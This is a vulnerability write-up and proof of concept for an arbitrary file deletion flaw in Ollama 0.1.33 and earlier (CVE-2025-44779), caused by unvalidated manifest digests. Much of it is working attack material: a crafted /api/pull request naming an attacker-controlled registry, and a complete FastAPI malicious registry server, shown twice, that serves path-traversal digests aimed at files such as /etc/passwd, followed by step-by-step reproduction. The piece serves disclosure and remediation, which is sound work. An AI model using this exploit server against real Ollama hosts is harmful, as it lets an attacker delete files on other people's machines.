CVEID: CVE-2025-44779

Vulnerability type: Incorrect Access Control

Affected versions: Ollama <= 0.1.33

Description: In Ollama versions <= 0.1.33, when saving a pulled digest, if a file already exists at the target path, Ollama treats this as a digest mismatch and deletes the existing file. Because the digest value from the manifest is used to build the path without validation, a malicious registry can supply a path-traversal digest and delete arbitrary files on the host.

Author: a1batr0ss

Remediation: Upgrade Ollama to version 0.1.34 or later

What is Ollama?

Ollama is a lightweight, user-friendly platform designed to run and manage large language models locally on personal machines. It allows users to easily download, configure, and interact with powerful AI models like LLaMA and Mistral without needing cloud infrastructure. Ollama is particularly popular among developers and researchers who want more control over their AI workflows, data privacy, and system performance. Its streamlined interface and local-first approach make it an ideal choice for experimenting with and deploying generative AI applications in secure, offline environments.


Ollama’s HTTP server exposes multiple API endpoints, each performing different operations. The specific functions of these endpoints are illustrated in the diagram below.

image-20250317195119032

Deploy version 0.1.33 of Ollama using Docker with a single command:

docker run -d --name ollama -p 11434:11434 ollama/ollama:0.1.33

image-20250806100636798

Manifest file

According to Ollama’s mechanism, the /api/pull endpoint pulls models from the official Ollama registry by default. However, it can also pull from a self-hosted private registry. Research showed that by specifying the following parameters in the pull request, models can be retrieved from a private server instead.

  • 10.211.55.3:11434 is the address of the Ollama service being attacked.
  • 192.168.200.237 is the address of the self-hosted private registry server.
POST /api/pull HTTP/1.1
Host: 10.211.55.3:11434
Content-Type: application/json
Content-Length: 77

{
  "name": "192.168.200.237/tianweng-anquan/a1batr0ss",
  "insecure": true
}
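
For reference, the same pull request can be issued from Python's standard library. The addresses are the ones used throughout this article:

```python
import json
import urllib.request

# 10.211.55.3:11434 is the Ollama service; 192.168.200.237 is the private registry.
payload = json.dumps({
    "name": "192.168.200.237/tianweng-anquan/a1batr0ss",
    "insecure": True,  # allow plain-HTTP access to the registry
}).encode()

req = urllib.request.Request(
    "http://10.211.55.3:11434/api/pull",
    data=payload,
    headers={"Content-Type": "application/json"},
)
# resp = urllib.request.urlopen(req)  # uncomment where both hosts are reachable
```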

Let’s first stand up a private server with FastAPI and see what happens when we send the above request.

from fastapi import FastAPI, Request, Response

app = FastAPI()

if __name__ == "__main__":
    import uvicorn
    uvicorn.run(app, host='0.0.0.0', port=80)

We found that the response packet reported an error: the manifest file was not found when pulling the image. (This is Ollama’s mechanism: when you run ollama pull <model>, the Ollama client first sends a request to the registry server to query the metadata of the model.)

image-20250317183351201

The server side also logged the requested path: /v2/tianweng-anquan/a1batr0ss/manifests/latest. This must be the manifest URL that the client requests from the registry server.

image-20250806102001137
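
Putting the model name from the pull request together with the path seen in the server log, the client appears to derive the manifest URL as follows. This is a Python sketch of the observed behaviour; the function name is ours, not Ollama's:

```python
def manifest_url(name: str, tag: str = "latest", scheme: str = "http") -> str:
    """Build the registry manifest URL for a model reference.

    Sketch of the observed behaviour: the first path component of the
    model name is the registry host, the remainder is the repository,
    and the tag defaults to "latest".
    """
    host, _, repo = name.partition("/")
    return f"{scheme}://{host}/v2/{repo}/manifests/{tag}"

print(manifest_url("192.168.200.237/tianweng-anquan/a1batr0ss"))
# http://192.168.200.237/v2/tianweng-anquan/a1batr0ss/manifests/latest
```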

This brings us to the manifest file. Below is a typical manifest, with its key fields:

  • config (container configuration layer): stores the Docker container's metadata, including runtime configuration, environment variables, Entrypoint, CMD, working directory, and so on.
  • layers (image layer data): stores the filesystem layers (RootFS) of the Docker image. Each layer represents a set of file changes, such as the result of a COPY or RUN instruction.
  • digest: a content hash used to verify the integrity of the config and layers blobs.
{
  "schemaVersion": 2,
  "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
  "config": {
    "mediaType": "application/vnd.docker.container.image.v1+json",
    "digest": "sha256:9c46aefae6c6d1e9c1c1b25b8a6f8e67a10bffbdf1b5a82842a527776b8f447a",
    "size": 7023
  },
  "layers": [
    {
      "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
      "digest": "sha256:3a2e9a64b4e5e2b77f9a6f2bb2e9235db934e6d3a9c0b1d3837cd8b24d3f6dfb",
      "size": 2794576
    },
    {
      "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
      "digest": "sha256:5b8c05cddf924c0c3e5f5a5e3f0b4a2c1b96a8a5ff8b2e99a3d5372c5f1e3a28",
      "size": 1484567
    }
  ]
}
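
Registry digests take the form sha256:<hex>; a well-behaved client verifies a downloaded blob by hashing it and comparing against the manifest. A minimal illustration of that check (our helper, not Ollama's code):

```python
import hashlib

def verify_layer(blob: bytes, digest: str) -> bool:
    """Check a downloaded blob against its manifest digest.

    Registry digests have the form "sha256:<hex>"; the client hashes
    the blob and compares the result. Illustrative helper only.
    """
    algo, _, expected = digest.partition(":")
    if algo != "sha256":
        raise ValueError(f"unsupported digest algorithm: {algo}")
    return hashlib.sha256(blob).hexdigest() == expected

data = b"hello"
good = "sha256:" + hashlib.sha256(data).hexdigest()
print(verify_layer(data, good))         # True
print(verify_layer(b"tampered", good))  # False
```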

Construct a malicious server

We have discovered that before pulling an image, the Ollama client first sends a request to the malicious registry server’s /v2/tianweng-anquan/a1batr0ss/manifests/latest endpoint to retrieve metadata (i.e., the manifest file).

Through our research, we found that the Ollama client iterates over the digest values in the layers section of the metadata, requesting, verifying, and then attempting to save each one (note that the first digest in the layers section is not saved in full).

Interestingly, according to Ollama’s mechanism, during the saving process of a digest, if a file already exists at the target path, Ollama will throw a digest mismatch error. While reporting the error, it will also delete the existing file at that path.
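
Ollama itself is written in Go, but the flawed save step can be sketched in Python. This is assumed behaviour reconstructed from the observations above; the function and directory names are hypothetical:

```python
import os

def save_digest(blobs_dir: str, digest: str, data: bytes) -> None:
    """Sketch of the vulnerable save step (illustrative, not Ollama's Go code).

    The digest string from the manifest is joined into the blob path
    without validation, so "../" sequences escape blobs_dir. If a file
    already exists at the resulting path, the write is treated as a
    digest mismatch -- and the pre-existing file is deleted while the
    error is reported.
    """
    path = os.path.join(blobs_dir, digest)  # no sanitisation of "digest"
    if os.path.exists(path):
        os.remove(path)  # existing file at the target path is removed
        raise ValueError(f"digest mismatch: {digest}")
    with open(path, "wb") as f:
        f.write(data)
```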

image-20250806112940904

Based on the above principle, we can construct a malicious server accordingly.

from fastapi import FastAPI, Request, Response

app = FastAPI()

@app.get("/v2/tianweng-anquan/a1batr0ss/manifests/latest")
async def evilManifest():
    return {
        "schemaVersion": 2,
        "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
        "config": {
            "mediaType": "application/vnd.docker.container.image.v1+json",
            "digest": "../../../../../../../../../../../../../etc/passwd",
            "size": 10,
        },
        "layers": [
            {
                "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
                "digest": "../../../../../../../../../../../../../file/targetFile",
                "size": 10,
            }
        ],
    }


@app.head("/file/targetFile")
async def fake_notfound_head(response: Response):
    response.headers["Docker-Content-Digest"] = "../../../../../../../../../../../../../file/targetFile"
    return ''

@app.get("/file/targetFile", status_code=206)
async def fake_notfound_get(response: Response):
    response.headers["Docker-Content-Digest"] = "../../../../../../../../../../../../../file/targetFile"
    response.headers["E-Tag"] = "\"../../../../../../../../../../../../../file/targetFile\""
    return 'Deleted'


if __name__ == "__main__":
    import uvicorn
    uvicorn.run(app, host='0.0.0.0', port=80)

Proof of Concept (POC)

Create the /file/targetFile file on the Ollama server.

image-20250317135521783

Deploy a malicious server disguised as a private registry server.

from fastapi import FastAPI, Request, Response

app = FastAPI()

@app.get("/v2/tianweng-anquan/a1batr0ss/manifests/latest")
async def evilManifest():
    return {
        "schemaVersion": 2,
        "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
        "config": {
            "mediaType": "application/vnd.docker.container.image.v1+json",
            "digest": "../../../../../../../../../../../../../etc/passwd",
            "size": 10,
        },
        "layers": [
            {
                "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
                "digest": "../../../../../../../../../../../../../file/targetFile",
                "size": 10,
            }
        ],
    }


@app.head("/file/targetFile")
async def fake_notfound_head(response: Response):
    response.headers["Docker-Content-Digest"] = "../../../../../../../../../../../../../file/targetFile"
    return ''

@app.get("/file/targetFile", status_code=206)
async def fake_notfound_get(response: Response):
    response.headers["Docker-Content-Digest"] = "../../../../../../../../../../../../../file/targetFile"
    response.headers["E-Tag"] = "\"../../../../../../../../../../../../../file/targetFile\""
    return 'Deleted'


if __name__ == "__main__":
    import uvicorn
    uvicorn.run(app, host='0.0.0.0', port=80)

image-20250317134635614

Send a crafted data packet to the /api/pull endpoint, where 10.211.55.3:11434 is the Ollama service address, and 192.168.200.237 is the address of the crafted malicious server.

image-20250806114731697

image-20250806115025717

Check the /file/targetFile file on the Ollama server again and find that it has been deleted.

image-20250806114758487